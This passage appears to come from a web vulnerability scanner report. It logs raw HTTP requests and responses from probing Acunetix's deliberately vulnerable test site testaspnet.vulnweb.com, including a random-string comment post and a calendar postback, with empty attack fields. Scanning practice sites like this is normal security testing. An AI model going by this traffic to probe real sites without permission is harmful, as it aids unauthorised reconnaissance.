Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter	btnSend
Attack
Evidence
Show / hide Request and Response
Request Header - size: 593 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1381 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,381 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv&tbComment=hvEYyWNN&btnSend=Send+comment
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:07 GMT Content-Length: 14360
Response Body - size: 14,360 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgoCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkAgkPZBYCAgEPZBYGZg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAgEPZBYCZg8WAh4FY2xhc3MFB0NvbW1lbnRkAgIPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kZLtjZhxvUS4ci8HIFlqscBeWoXbu" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKm2I3mCQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJ0OOIIRYqVtGT38Je7OHUSHamD9" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 4:42:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA">hvEYyWNN</textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8151&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCA9LQXJ9oIZGRkHzStIgp52y3yxnSblMEDwd4e3TU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK%2Bi8aXCQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPM52vuLXludYR%2F1hkwflx7liV7JI%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:47:32 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCA9LQXJ9oIZGRkHzStIgp52y3yxnSblMEDwd4e3TU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK+i8aXCQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPM52vuLXludYR/1hkwflx7liV7JI=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:White" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" 